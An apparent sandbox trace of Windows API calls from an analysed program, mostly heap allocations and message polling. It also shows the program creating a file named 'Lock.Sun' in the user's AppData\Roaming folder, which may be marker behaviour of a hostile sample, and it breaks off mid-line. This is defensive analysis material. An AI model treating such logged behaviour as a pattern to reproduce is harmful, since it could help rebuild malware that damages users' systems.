PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0151.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0151.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0151.224] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.224] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0151.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0151.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0151.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0151.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Sun" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.sun"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0151.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0151.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0151.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0151.226] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0151.226] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0151.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0151.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.228] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0151.228] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0151.228] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0151.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0151.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fb8 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0151.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0151.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0151.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0151.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0151.230] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0151.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0151.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0151.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0151.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0151.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0151.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0151.231] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0151.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0151.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0151.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.232] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 